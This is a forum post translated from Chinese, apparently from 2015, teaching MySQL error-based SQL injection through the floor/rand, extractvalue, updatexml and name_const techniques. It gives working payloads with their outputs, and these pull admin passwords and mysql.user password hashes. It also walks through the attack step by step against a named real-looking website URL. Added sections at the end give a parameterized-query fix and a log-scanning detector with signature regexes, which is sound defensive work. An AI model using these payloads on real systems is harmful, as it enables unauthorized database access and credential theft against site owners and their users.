
MySQL error-based injection: the floor, ExtractValue and UpdateXml techniques and how they are used

Posted by the thread starter on 2015-11-11 19:03:37

1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message. To retrieve other data, replace the version() call with the query whose result you want returned.
For example, to retrieve the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
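All three techniques above rely on the same two application defects: the id value is concatenated into the SQL string, and the raw MySQL error text is returned to the client. The following added example (not code from the original post) shows that vulnerable lookup beside a hardened one; it uses an in-memory SQLite table named article with a constructed sample row as a stand-in for the MySQL table, so the database-side error wording differs from MySQL's, but the leak-versus-no-leak behaviour is the same.

```python
import sqlite3

# Message returned to the client. The real database error is logged server-side only:
# every technique on this page needs the raw MySQL error text to reach the response.
GENERIC_ERROR = "Article not found."


def make_db():
    """In-memory SQLite stand-in for the MySQL 'article' table (constructed sample row)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table article (id integer primary key, title text, content text)")
    db.execute("insert into article values (1, 'test', 'do it')")
    return db


def vulnerable_lookup(db, user_id):
    """The pattern the page exploits: the raw parameter is spliced into the SQL string
    and the driver's error text is handed straight back to the caller."""
    try:
        row = db.execute(f"select * from article where id = {user_id}").fetchone()
        return {"row": row, "error": None}
    except sqlite3.Error as e:
        return {"row": None, "error": str(e)}   # leaks the database's own message


def safe_lookup(db, user_id, log=print):
    """Hardened lookup: enforce the expected type, bind the value as a parameter,
    and return only a generic message whatever the database reports."""
    if not isinstance(user_id, str) or not user_id.isdigit():
        return {"row": None, "error": GENERIC_ERROR}
    try:
        row = db.execute("select * from article where id = ?", (int(user_id),)).fetchone()
    except sqlite3.Error as e:
        log(f"db error for id={user_id!r}: {e}")   # server-side log, never the response
        return {"row": None, "error": GENERIC_ERROR}
    return {"row": row, "error": None if row else GENERIC_ERROR}


# Constructed attacker input in the shape of the ExtractValue test statement above.
PAYLOAD = "1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)))"
```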

Further collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injecting with NAME_CONST
It's been a while since I've made an SQL injection tutorial, so I thought I should make a new tutorial using the name_const method. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)
  K4 F6 P! J" x7 k, O2 q/ g

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
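For defenders, the payload shapes collected on this page (floor(rand(0)*2) with GROUP BY, extractvalue, updatexml and name_const) and the error strings they produce are the two things to look for. The following added example (not from the original post) scans constructed access-log lines for those request signatures after URL decoding, and checks response bodies for MySQL error text that should never reach a client.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures for the four error-based techniques on this page,
# applied to the URL-decoded, lower-cased request target.
REQUEST_SIGNATURES = {
    "floor/rand group by": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*group\s+by", re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\("),
    "updatexml": re.compile(r"\bupdatexml\s*\("),
    "name_const": re.compile(r"\bname_const\s*\("),
}

# Response-side strings. If any of these reach a client, the application is
# echoing raw MySQL errors, which is the channel every technique above relies on.
RESPONSE_LEAKS = (
    "duplicate entry",        # ERROR 1062 from the floor/rand trick
    "xpath syntax error",     # ERROR 1105 from extractvalue/updatexml
    "duplicate column name",  # the name_const trick
)

REQUEST_TARGET = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)')


def classify_request(line):
    """Return the names of the techniques whose signature matches one access-log line."""
    m = REQUEST_TARGET.search(line)
    target = m.group(1) if m else line
    decoded = unquote_plus(target).lower()   # '+' and %xx encoding hide keywords from naive greps
    return [name for name, rx in REQUEST_SIGNATURES.items() if rx.search(decoded)]


def scan_log(lines):
    """Return {line index: techniques} for every line that matches at least one signature."""
    return {i: n for i, n in ((i, classify_request(l)) for i, l in enumerate(lines)) if n}


def leaks_db_error(response_body):
    """True if a response body carries MySQL error text that should never reach a client."""
    body = response_body.lower()
    return any(s in body for s in RESPONSE_LEAKS)


# Constructed sample access-log lines (combined log format); the payloads are the ones shown on this page.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Nov/2015:19:03:37 +0800] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [11/Nov/2015:19:04:02 +0800] "GET /article.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 233',
    '10.0.0.9 - - [11/Nov/2015:19:04:40 +0800] "GET /article.php?id=1+and+extractvalue(1,concat(0x5c,(select+pass+from+admin+limit+1))) HTTP/1.1" 500 198',
    '10.0.0.9 - - [11/Nov/2015:19:04:58 +0800] "GET /article.php?id=1+and+1=(updatexml(1,concat(0x3a,(select+user())),1)) HTTP/1.1" 500 205',
    '10.0.0.9 - - [11/Nov/2015:19:05:11 +0800] "GET /detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 210',
]
```

A real deployment would feed the same two checks to a SIEM rule: flag the request signature, and treat any response matching RESPONSE_LEAKS as a confirmed error-disclosure bug regardless of whether an attacker sent the request.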